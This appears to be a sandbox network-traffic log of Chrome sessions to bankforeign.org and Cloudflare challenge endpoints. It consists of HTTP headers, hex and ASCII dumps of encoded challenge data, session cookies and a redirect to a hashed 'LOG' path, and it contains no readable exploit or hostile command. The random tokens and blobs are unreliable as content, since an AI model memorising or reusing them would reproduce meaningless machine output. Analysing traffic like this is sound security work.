                                                            2024-02-01 20:38:37 UTC16384OUTData Raw: 76 5f 38 34 65 63 66 66 32 38 34 63 39 63 37 62 64 38 3d 72 38 41 36 25 32 62 53 37 6c 66 31 66 4c 4e 42 54 53 53 24 63 24 6d 36 65 76 76 24 45 36 6e 34 37 4e 24 57 24 37 55 24 2d 77 24 35 24 4e 55 42 2d 37 39 24 56 35 24 37 66 34 37 46 24 46 47 41 34 31 5a 67 24 71 72 36 53 74 24 44 73 67 2d 34 6a 42 24 42 44 24 49 6b 73 66 24 69 68 46 41 53 6b 6f 24 42 4e 54 24 4c 31 24 55 53 55 68 24 72 4e 24 31 24 31 38 41 24 30 70 34 76 34 6d 68 24 37 38 37 65 24 6d 66 37 6f 24 49 47 6f 34 74 77 24 78 50 34 69 31 31 72 24 42 6d 24 31 63 46 46 24 58 30 72 71 5a 31 69 78 4f 76 24 58 50 76 4e 6b 41 59 24 53 5a 31 66 50 62 46 55 77 56 57 67 71 48 66 38 69 24 24 72 59 6f 41 24 34 6a 4c 6f 6c 66 34 44 31 42 57 6f 24 32 4e 76 54 32 49 24 71 59 32 6e 50 59 45 78 4a 30 68 53
                                                            Data Ascii: v_84ecff284c9c7bd8=r8A6%2bS7lf1fLNBTSS$c$m6evv$E6n47N$W$7U$-w$5$NUB-79$V5$7f47F$FGA41Zg$qr6St$Dsg-4jB$BD$Iksf$ihFASko$BNT$L1$USUh$rN$1$18A$0p4v4mh$787e$mf7o$IGo4tw$xP4i11r$Bm$1cFF$X0rqZ1ixOv$XPvNkAY$SZ1fPbFUwVWgqHf8i$$rYoA$4jLolf4D1BWo$2NvT2I$qY2nPYExJ0hS
                                                            2024-02-01 20:38:37 UTC13498OUTData Raw: 48 66 42 55 53 24 42 36 4c 41 37 50 24 2d 4e 41 41 42 36 37 55 24 41 37 6e 24 37 55 6d 65 68 46 24 38 67 6d 55 37 5a 59 73 24 42 55 53 53 24 41 36 41 4e 2b 59 24 4b 36 41 66 4c 7a 36 41 24 69 66 37 6e 24 6b 36 31 24 4c 6c 34 4c 36 53 24 37 70 24 48 36 4c 4e 37 75 24 6e 24 56 77 4c 56 52 43 58 46 24 4c 38 44 66 36 78 55 4c 6f 24 53 24 42 6a 37 44 55 4e 6c 4c 47 24 36 24 6a 34 72 44 37 49 24 4a 50 69 70 37 2d 24 6f 38 72 34 24 4e 24 76 52 72 38 37 2d 24 31 44 37 36 37 49 24 67 58 78 34 53 56 34 79 24 5a 34 58 50 37 61 24 65 41 53 6d 37 63 24 65 61 53 2d 37 48 66 58 66 24 6c 37 56 24 71 55 31 75 50 51 24 61 44 53 4b 37 34 36 59 55 78 59 24 45 24 65 55 42 6c 37 7a 24 61 34 78 50 37 2d 36 4e 41 31 6d 37 53 36 4f 55 42 76 37 77 36 5a 41 31 2d 24 6a 34 49 41 53
                                                            Data Ascii: HfBUS$B6LA7P$-NAAB67U$A7n$7UmehF$8gmU7ZYs$BUSS$A6AN+Y$K6AfLz6A$if7n$k61$Ll4L6S$7p$H6LN7u$n$VwLVRCXF$L8Df6xULo$S$Bj7DUNlLG$6$j4rD7I$JPip7-$o8r4$N$vRr87-$1D767I$gXx4SV4y$Z4XP7a$eASm7c$eaS-7HfXf$l7V$qU1uPQ$aDSK746YUxY$E$eUBl7z$a4xP7-6NA1m7S6OUBv7w6ZA1-$j4IAS
                                                            2024-02-01 20:38:37 UTC1199INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-chl-out: WFFJ5w+oyP6ulQZbUldEo4utdaHC/TVctYNv/sQrRQVDkR+gQ2Dgbw/m8wNStCnJuioMOu2aUJsur6hAYF62BTsri1DtxkGvxJ/DhXv0/PaD5dzNpBx57gfzxbWoFETb$SjgtOovWaiOmxw/by4+ukg==
                                                            cf-chl-out-s: zOcUFqQhlac8r8trmZoDcCUauXOV1RxSJm6HGOSnghTxnMbB9SowfqiSsmv0pwpu1Nfh2IKaG0MJF+cBjQBE+5fMX/sCOHwCYJwEmQKcdknwU9q+kvLrPGEaBmZpEwsSx2WaCwtIjMRx4D9i40BuGsKcWVLHkRo70ztBQrV5DGKwH0RMuGhYEQDgvhF1uGfhHRY5bXk/bWbJZnQBGyVb0zmILto5eg2mOW305EndW8WBMr+KZTbNt3RHfvNeg4j6807j+6opWCBBYPUE4Vc+3clulbyipnuyw4X1mCnkGj22TM8mjvrdDeYhMPNTL2CZpGa/1g6UhR3I43CG6wQV5SWtXUs9LdVmWLYtMF2nty7HHOeUQx0JIkgATr0Xf83vErNeBgFbEdTMbeJPdrz5vd6qqpTpMJNZv+awfuLWmo6EGZuV4PBTFp/Ysjb+rajkk5xq5ZPj2x5JQzcVDYYTUH63MZyHOSnBXvgWOsuk6EI9CtOoNGfs2HYCqiNJSidYWVR1e6EX4Sr0zdjyFh0hdaedfFHyOgHB7QesFN+GOrEi8Ypv7+f2fl7AGJduKMwl669De/ma32DeiQedmAL++yjdSFQfiBTL0o8yDQk66iRtfnobxjSQs4P4AByuKlJeP3nReIF3rnO4m69Gji6aHLgZLHUcWDhWLsMaQNRI5XqQtlpTg9CUv0JHDp1GaTTOBQKh33433Fwsatp+EA08twVyGUj+yvv7RTKBL9X9p0/rIjg31gH2evEVQb93ZN5u$2pQSMr8+4PHe9b6RqhSq1w==
                                                            Server: cloudflare
                                                            CF-RAY: 84ecffc2ba7769e9-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:37 UTC170INData Raw: 64 62 30 0d 0a 66 62 62 43 76 4c 36 78 74 4a 71 4a 75 70 6d 49 6a 73 2b 2b 6a 36 4b 2f 76 36 50 58 31 62 47 33 6c 38 6a 50 74 4a 79 64 34 4c 44 44 77 75 48 56 76 64 6a 6f 77 63 53 6f 79 4c 72 43 30 73 7a 52 35 62 54 30 78 38 43 34 2b 4d 75 79 36 76 50 54 74 74 6a 68 41 2f 33 37 38 2f 6a 45 39 4d 54 57 42 76 62 67 45 51 76 37 35 4f 67 50 45 38 37 33 31 78 63 4d 48 51 2f 5a 46 77 77 59 38 68 6a 37 39 50 67 62 33 53 55 56 35 41 58 6c 37 65 77 46 4d 65 34 67 44 42 38 45 4c 75 34 45 41 2f 55 52 45 42 67 50 4e
                                                            Data Ascii: db0fbbCvL6xtJqJupmIjs++j6K/v6PX1bG3l8jPtJyd4LDDwuHVvdjowcSoyLrC0szR5bT0x8C4+Muy6vPTttjhA/378/jE9MTWBvbgEQv75OgPE8731xcMHQ/ZFwwY8hj79Pgb3SUV5AXl7ewFMe4gDB8ELu4EA/UREBgPN
                                                            2024-02-01 20:38:37 UTC1369INData Raw: 42 41 79 4d 52 6f 51 49 78 6f 67 4d 67 4d 2b 41 78 63 2b 4f 53 4d 63 52 43 38 2f 48 31 52 52 4f 53 68 5a 45 7a 55 55 4c 42 74 61 53 6a 77 37 50 54 42 55 58 55 41 35 49 6a 5a 6c 59 69 78 75 4f 46 73 39 55 6d 42 71 4d 6e 4e 51 4f 47 35 54 52 46 68 2b 63 6d 6f 39 53 6d 39 50 57 55 55 35 56 48 69 41 56 32 5a 5a 5a 33 6c 71 63 59 42 79 62 45 31 31 5a 6d 75 4d 56 57 69 57 69 5a 56 31 65 33 6c 63 58 6f 42 77 63 46 6d 68 61 61 61 49 6e 49 61 49 66 4b 79 6f 6d 6f 74 73 68 59 4f 66 74 58 4b 73 69 4a 61 50 75 6f 69 41 6b 72 47 4c 75 35 57 44 73 73 61 62 6b 34 57 58 6a 59 71 6f 6d 4b 66 44 69 36 65 31 74 62 53 51 70 38 69 52 79 62 76 66 72 38 71 37 6d 4c 62 4f 78 62 6e 52 70 73 48 69 74 73 44 62 32 4b 6e 44 71 4d 54 6e 36 4f 7a 75 39 50 53 76 36 4c 6a 4f 78 62 33 79
                                                            Data Ascii: BAyMRoQIxogMgM+Axc+OSMcRC8/H1RROShZEzUULBtaSjw7PTBUXUA5IjZlYixuOFs9UmBqMnNQOG5TRFh+cmo9Sm9PWUU5VHiAV2ZZZ3lqcYBybE11ZmuMVWiWiZV1e3lcXoBwcFmhaaaInIaIfKyomotshYOftXKsiJaPuoiAkrGLu5WDssabk4WXjYqomKfDi6e1tbSQp8iRybvfr8q7mLbOxbnRpsHitsDb2KnDqMTn6Ozu9PSv6LjOxb3y
                                                            2024-02-01 20:38:37 UTC1369INData Raw: 34 62 47 69 6c 4b 42 52 34 62 49 45 4d 69 52 55 4d 6b 51 41 39 44 4b 45 55 52 47 7a 78 49 46 56 4a 55 4c 44 78 4f 52 44 39 62 5a 6d 45 36 58 32 56 64 54 55 70 69 4a 31 4a 41 54 54 35 52 5a 55 46 43 57 6c 68 6d 54 6d 74 63 58 31 56 65 54 32 31 33 56 6d 4e 6a 65 57 5a 55 5a 34 46 63 57 48 42 70 59 59 4b 43 63 48 4a 76 6b 6e 68 70 64 48 4f 52 62 5a 46 33 6c 6e 4b 69 6b 5a 6c 31 66 36 57 64 65 48 53 44 6f 58 78 33 71 6f 79 42 6f 61 32 6e 6b 72 61 6d 6c 49 71 36 6b 4a 75 4e 6d 35 65 76 6b 5a 79 51 6f 35 61 67 6b 37 65 5a 70 37 71 72 6e 63 36 36 73 4b 36 4b 6e 38 53 79 77 34 33 49 78 71 50 48 72 4b 61 77 75 4d 33 65 71 39 47 2b 73 63 48 69 74 37 37 6a 70 63 6d 73 34 71 79 37 37 2f 44 6d 77 50 58 4e 35 39 54 6b 36 2b 57 32 39 4d 72 4c 31 39 7a 55 34 38 37 4e 39
                                                            Data Ascii: 4bGilKBR4bIEMiRUMkQA9DKEURGzxIFVJULDxORD9bZmE6X2VdTUpiJ1JATT5RZUFCWlhmTmtcX1VeT213VmNjeWZUZ4FcWHBpYYKCcHJvknhpdHORbZF3lnKikZl1f6WdeHSDoXx3qoyBoa2nkramlIq6kJuNm5evkZyQo5agk7eZp7qrnc66sK6Kn8Syw43IxqPHrKawuM3eq9G+scHit77jpcms4qy77/DmwPXN59Tk6+W29MrL19zU487N9
                                                            2024-02-01 20:38:37 UTC603INData Raw: 5a 54 69 51 6e 47 6b 6c 4d 4a 79 42 42 4b 69 55 7a 45 79 6f 73 4a 68 59 32 4e 54 77 76 4f 54 31 42 4d 7a 6f 34 4e 46 30 2b 52 30 59 6e 53 54 78 4c 51 44 77 2f 4c 56 4e 52 54 54 4a 4c 56 46 68 73 4e 30 39 62 63 6e 70 65 59 46 47 46 59 31 64 38 52 6f 64 6e 61 46 2b 44 61 32 39 66 68 47 64 68 54 32 35 74 64 6f 6d 64 61 47 65 56 6c 57 78 75 6f 58 56 37 63 56 39 38 66 5a 74 33 70 59 53 76 71 6e 75 4c 61 5a 43 4b 69 36 5a 7a 6a 6f 4f 57 6d 49 71 58 72 70 64 2f 6c 37 4f 50 75 5a 57 69 68 73 69 68 6c 73 47 32 6d 49 61 58 76 4b 54 44 69 71 6d 6f 78 36 50 4c 71 4d 75 53 7a 61 6d 73 79 72 57 77 30 72 76 6b 76 63 4f 76 35 38 50 43 35 64 33 44 33 4f 58 43 78 4c 76 79 36 4d 69 2b 74 73 33 4b 78 50 58 55 33 76 33 31 36 39 79 35 77 76 48 66 33 2f 37 66 35 4f 66 63 35 4e
                                                            Data Ascii: ZTiQnGklMJyBBKiUzEyosJhY2NTwvOT1BMzo4NF0+R0YnSTxLQDw/LVNRTTJLVFhsN09bcnpeYFGFY1d8RodnaF+Da29fhGdhT25tdomdaGeVlWxuoXV7cV98fZt3pYSvqnuLaZCKi6ZzjoOWmIqXrpd/l7OPuZWihsihlsG2mIaXvKTDiqmox6PLqMuSzamsyrWw0rvkvcOv58PC5d3D3OXCxLvy6Mi+ts3KxPXU3v3169y5wvHf3/7f5Ofc5N
                                                            2024-02-01 20:38:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.449768104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:37 UTC1053OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/461457:1706818037:TP9mi9T_s6X4VHjzA43SctCQXweCPTtEqjXfreTTO6Q/84ecff1778c36766/f5b0b7c7d91ebf9 HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            Content-Length: 3258
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            Content-type: application/x-www-form-urlencoded
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            CF-Challenge: f5b0b7c7d91ebf9
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://bankforeign.org
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://bankforeign.org/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:37 UTC3258OUTData Raw: 76 5f 38 34 65 63 66 66 31 37 37 38 63 33 36 37 36 36 3d 24 42 6b 30 4e 64 38 4f 45 57 45 32 50 69 79 64 64 37 25 32 62 37 6a 30 2d 43 43 37 32 37 54 61 32 47 37 6e 37 57 61 35 79 43 38 49 37 50 61 64 6c 37 58 37 49 4b 37 38 45 34 38 6f 37 6f 61 37 4f 4a 38 73 36 30 64 2d 6c 78 37 7a 50 38 52 73 43 35 45 38 6e 37 44 45 37 73 59 31 6b 37 4f 6d 78 30 37 76 37 4a 31 24 4a 79 37 64 30 35 47 37 6c 30 35 4a 37 4f 30 4a 42 37 49 4b 45 76 37 6d 37 46 34 38 64 2b 48 4d 53 54 62 52 37 73 30 64 58 37 44 61 61 2d 72 79 50 37 69 61 6b 37 58 79 62 44 32 69 24 38 59 61 37 65 37 32 4a 37 59 30 37 54 64 6b 38 39 7a 47 45 37 7a 49 33 31 69 64 4b 38 66 74 47 6a 6a 32 50 37 36 6e 51 55 38 37 38 66 37 37 6c 6b 53 37 61 6d 38 44 24 32 37 57 57 48 66 38 61 37 44 30 38 32 35 35
                                                            Data Ascii: v_84ecff1778c36766=$Bk0Nd8OEWE2Piydd7%2b7j0-CC727Ta2G7n7Wa5yC8I7Padl7X7IK78E48o7oa7OJ8s60d-lx7zP8RsC5E8n7DE7sY1k7Omx07v7J1$Jy7d05G7l05J7O0JB7IKEv7m7F48d+HMSTbR7s0dX7Daa-ryP7iak7XybD2i$8Ya7e72J7Y07Tdk89zGE7zI31idK8ftGjj2P76nQU878f77lkS7am8D$27WWHf8a7D08255
                                                            2024-02-01 20:38:38 UTC1308INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            set-cookie: cf_chl_rc_m=;Expires=Wed, 31 Jan 2024 20:38:37 GMT;SameSite=Strict
                                                            cf-chl-out: KEIb7EoZ2H4Y2zQ5bM4vSsSWzZ5qixpwJbCCLvstJC8X0yoQQtiNFXTPJyrNQ0GlrrNGUP+o5Rz43p7C9G0nww==$LCKzesJe3pdJIriuKaJ60A==
                                                            cf-chl-out-s: +rI8oPL978pFErJtDCRsW0pxgYg3PApIDu1mJOPBD+Q80PlQjdVTA5XE4wCXvxGTkw4hIuBz/+8MDVo8qFA6kI2NPdG8DDoLjgkMbf7rb7SJCsPKBYZ+dkF/17m9iX2+0ET80LRrQ6tlnhGyRfDgoe+BcSwBBKAq2nNVcbVrZwrXmICjZswx/C09j+xowVN1r/tpgu04SAB9kBw6Lj3x/K/KLRVeIuasSKEkAAJKNqcN5ddlgHxGn7gjhKWWktnieUKgBHFyjGM+U3VVj5+r+9c5A5ysCTjWBqEV9pjlVG/cUYtV3Dh2Wp5mWlTjgNktnMF3CBFZQSXMDYmPxGkKV3y4bZlXEF2GH2Gx7DIAyXBzOnjIJ4c3fMOOWLzu3C0IOsnUa3xW2l896Cf2dBflK3JTa0YkIuu2E22QbVeFt4ENCqd/JNyfOKIC4AwX+YhfZh/CNkFbeybGEq/rgr7a5JMUeayS36+XwZsXO2DVMPKuL82R9aInj96ap6gl/t6S$4qU9ZBCJCgy4GHAej6itLg==
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=48YxIUxFUT0DHnCczoezgOUrRzYgISNl3dJIInorDtP0lpLsJ75TyKMNg4TunX82D1p3otbx9AobPNVTm%2BDI0kRFqoYIfzXZk4QCAg8qbSCm%2BTljfbXQdbWHnB0EdBN%2BwYA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ecffc64dd212ee-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:38 UTC61INData Raw: 63 64 30 0d 0a 59 4a 65 43 64 32 74 6c 6c 45 2b 61 63 6e 36 61 6e 5a 78 67 70 49 57 61 65 5a 65 4c 63 35 56 6f 64 32 2b 49 67 48 75 78 6b 36 39 32 6a 36 61 49 62 49 61 61 69 71 71 31
                                                            Data Ascii: cd0YJeCd2tllE+acn6anZxgpIWaeZeLc5Vod2+IgHuxk692j6aIbIaaiqq1
                                                            2024-02-01 20:38:38 UTC1369INData Raw: 73 49 71 4d 76 59 4b 65 6b 4d 47 47 70 49 4c 4a 78 62 57 48 6a 34 2b 6d 68 4d 48 4e 6b 4a 57 6b 6d 4e 47 35 7a 71 58 54 76 71 33 54 75 4e 66 45 32 4e 33 61 74 2b 4b 62 76 63 65 30 72 4d 47 6d 75 4e 2f 4c 71 72 33 46 7a 73 50 71 39 72 44 58 2b 2f 58 63 7a 4d 2f 41 76 37 58 2b 7a 64 44 30 76 76 58 53 43 75 54 63 78 42 48 4b 35 4d 38 50 42 76 41 42 39 68 6e 6f 42 65 76 6d 33 53 41 4d 47 67 4c 61 38 65 54 63 44 2b 4c 79 36 65 45 43 4a 67 37 6d 41 43 54 77 49 77 54 2b 39 65 30 30 4d 68 72 78 39 68 63 50 4a 2f 6b 4b 50 30 51 78 47 44 68 47 41 41 41 37 48 54 73 37 4b 30 34 6a 4c 31 4a 4d 54 53 41 68 46 69 63 52 54 6a 6b 70 54 45 59 36 47 6b 4a 65 58 53 30 67 57 43 49 6e 4a 44 70 68 4a 7a 78 71 4c 6c 34 38 4d 46 46 42 59 46 4e 56 51 6d 64 48 57 31 78 56 64 6c 77
                                                            Data Ascii: sIqMvYKekMGGpILJxbWHj4+mhMHNkJWkmNG5zqXTvq3TuNfE2N3at+Kbvce0rMGmuN/Lqr3FzsPq9rDX+/XczM/Av7X+zdD0vvXSCuTcxBHK5M8PBvAB9hnoBevm3SAMGgLa8eTcD+Ly6eECJg7mACTwIwT+9e00Mhrx9hcPJ/kKP0QxGDhGAAA7HTs7K04jL1JMTSAhFicRTjkpTEY6GkJeXS0gWCInJDphJzxqLl48MFFBYFNVQmdHW1xVdlw
                                                            2024-02-01 20:38:38 UTC1369INData Raw: 33 2b 2f 76 37 4c 49 76 63 71 74 71 35 43 4d 6e 70 4b 63 31 49 7a 4f 71 38 54 57 72 36 79 37 79 4c 4f 76 76 64 69 36 35 4c 43 77 6e 74 66 68 6f 4c 6a 55 33 36 37 5a 79 38 62 46 38 38 44 68 77 63 44 4b 72 2f 6a 50 30 38 6a 39 30 72 6a 4e 33 50 44 73 2f 62 37 78 32 73 62 70 43 74 75 2f 7a 4f 45 50 38 50 50 63 36 50 48 33 34 4f 44 77 35 39 54 78 45 50 37 59 39 52 6b 4c 38 52 76 39 43 50 55 66 43 50 55 71 37 43 54 37 43 4f 38 51 45 7a 4d 6f 4c 51 4d 47 46 53 49 48 4f 77 55 61 48 7a 38 33 48 79 51 69 48 6a 6b 55 46 68 30 79 4d 7a 73 34 52 6a 41 59 45 55 6f 68 49 69 35 4d 50 79 45 31 4d 69 67 36 55 7a 34 73 4f 54 55 35 4c 32 49 6b 52 69 4d 34 58 53 4d 6f 59 30 77 73 49 56 38 6a 4f 32 42 6f 64 45 70 71 4e 46 52 78 62 6b 77 7a 64 44 6f 38 56 32 4e 32 65 33 46 6e
                                                            Data Ascii: 3+/v7LIvcqtq5CMnpKc1IzOq8TWr6y7yLOvvdi65LCwntfhoLjU367Zy8bF88DhwcDKr/jP08j90rjN3PDs/b7x2sbpCtu/zOEP8PPc6PH34ODw59TxEP7Y9RkL8Rv9CPUfCPUq7CT7CO8QEzMoLQMGFSIHOwUaHz83HyQiHjkUFh0yMzs4RjAYEUohIi5MPyE1Mig6Uz4sOTU5L2IkRiM4XSMoY0wsIV8jO2BodEpqNFRxbkwzdDo8V2N2e3Fn
                                                            2024-02-01 20:38:38 UTC488INData Raw: 32 2f 30 49 76 4a 71 73 4b 63 71 61 71 6a 6f 4e 53 76 71 35 54 5a 75 39 43 32 6d 4c 57 56 74 75 54 47 75 38 44 52 74 72 36 65 6f 2b 76 6e 38 50 44 42 38 37 7a 64 77 76 61 7a 32 73 62 4f 38 4c 62 7a 31 62 2f 30 75 73 50 39 2b 38 44 57 77 41 6a 32 78 66 63 49 39 77 58 5a 2f 51 44 4d 46 4d 73 42 36 64 44 6b 39 2f 6a 54 45 67 72 33 32 42 77 45 37 78 45 68 49 4f 4d 66 2b 76 6b 4e 4c 53 59 6a 41 51 33 6a 2f 76 73 76 4c 41 59 32 2b 41 67 73 47 6a 77 62 45 78 4c 35 2f 6a 6f 4d 4d 45 45 61 52 6b 6b 62 51 43 30 4b 52 6b 4d 68 47 51 51 6c 52 69 55 75 4a 31 6c 58 56 6a 4d 58 46 52 73 38 4f 7a 4d 5a 4e 7a 6b 65 48 6b 4a 68 5a 47 55 32 4a 44 31 6f 51 6b 6f 75 63 30 59 2b 5a 55 45 32 56 6d 77 73 52 32 6c 63 4e 7a 46 75 62 30 70 65 65 58 78 67 64 56 64 65 58 6d 70 2f 5a
                                                            Data Ascii: 2/0IvJqsKcqaqjoNSvq5TZu9C2mLWVtuTGu8DRtr6eo+vn8PDB87zdwvaz2sbO8Lbz1b/0usP9+8DWwAj2xfcI9wXZ/QDMFMsB6dDk9/jTEgr32BwE7xEhIOMf+vkNLSYjAQ3j/vsvLAY2+AgsGjwbExL5/joMMEEaRkkbQC0KRkMhGQQlRiUuJ1lXVjMXFRs8OzMZNzkeHkJhZGU2JD1oQkouc0Y+ZUE2VmwsR2lcNzFub0peeXxgdVdeXmp/Z
                                                            2024-02-01 20:38:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.449769104.17.3.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:37 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1724395763:1706818044:48Oktt0s5MTU6dFdGgTX_IFhJzDfI-CAztyQWs6jl5M/84ecff284c9c7bd8/40a43fe0ff648d1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:38 UTC386INHTTP/1.1 400 Bad Request
                                                            Date: Thu, 01 Feb 2024 20:38:37 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: yr1cC0Igo+A01t5tFS2tmg==$V0RBgkjQosbPZ12DlQj5Ow==
                                                            Server: cloudflare
                                                            CF-RAY: 84ecffc74d85080b-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:38 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                            Data Ascii: 7invalid
                                                            2024-02-01 20:38:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.449770104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:38 UTC1184OUTPOST / HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            Content-Length: 4576
                                                            Cache-Control: max-age=0
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-platform: "Windows"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            Upgrade-Insecure-Requests: 1
                                                            Origin: https://bankforeign.org
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            Referer: https://bankforeign.org/?__cf_chl_tk=VHN6UJvCYOWIaoKHF0o4f0lISfiWLmR.K9wFt6RmMjc-1706819889-0-gaNycGzNEFA
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:38 UTC4576OUTData Raw: 34 38 38 31 34 31 38 34 66 35 39 30 66 62 34 63 65 34 30 34 34 32 31 64 39 31 31 36 64 61 35 36 35 66 34 63 37 37 36 31 66 61 62 65 65 62 64 64 66 38 66 35 62 37 39 32 65 31 62 62 66 66 62 63 3d 53 5f 42 57 41 49 68 58 38 77 6f 46 45 5a 30 46 2e 51 4b 69 74 51 4d 6f 31 69 57 58 62 4c 76 34 6a 33 46 74 72 69 32 70 51 54 55 2d 31 37 30 36 38 31 39 38 38 39 2d 31 2d 41 55 30 63 45 30 36 34 32 45 71 35 6b 65 2d 4b 7a 54 6b 4c 68 58 51 44 34 72 74 6d 46 73 33 61 45 32 57 30 45 64 51 57 54 4e 35 70 70 64 4c 4e 32 41 32 34 6a 69 78 56 73 36 58 76 58 74 73 79 35 34 61 38 76 70 71 56 50 67 69 6f 42 4a 77 6a 68 71 2d 58 53 69 6e 66 6b 68 59 73 39 6a 4c 63 51 75 76 30 69 72 6e 7a 63 69 66 55 39 4d 65 6a 59 77 41 48 38 4d 32 5f 57 6b 39 55 57 2d 5a 61 65 6e 76 57 4e
                                                            Data Ascii: 48814184f590fb4ce404421d9116da565f4c7761fabeebddf8f5b792e1bbffbc=S_BWAIhX8woFEZ0F.QKitQMo1iWXbLv4j3Ftri2pQTU-1706819889-1-AU0cE0642Eq5ke-KzTkLhXQD4rtmFs3aE2W0EdQWTN5ppdLN2A24jixVs6XvXtsy54a8vpqVPgioBJwjhq-XSinfkhYs9jLcQuv0irnzcifU9MejYwAH8M2_Wk9UW-ZaenvWN
                                                            2024-02-01 20:38:41 UTC1135INHTTP/1.1 302 Found
                                                            Date: Thu, 01 Feb 2024 20:38:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; path=/; expires=Fri, 31-Jan-25 20:38:38 GMT; domain=.bankforeign.org; HttpOnly; Secure; SameSite=None
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            Set-Cookie: PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7; path=/
                                                            Location: ./21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1
                                                            CF-Cache-Status: DYNAMIC
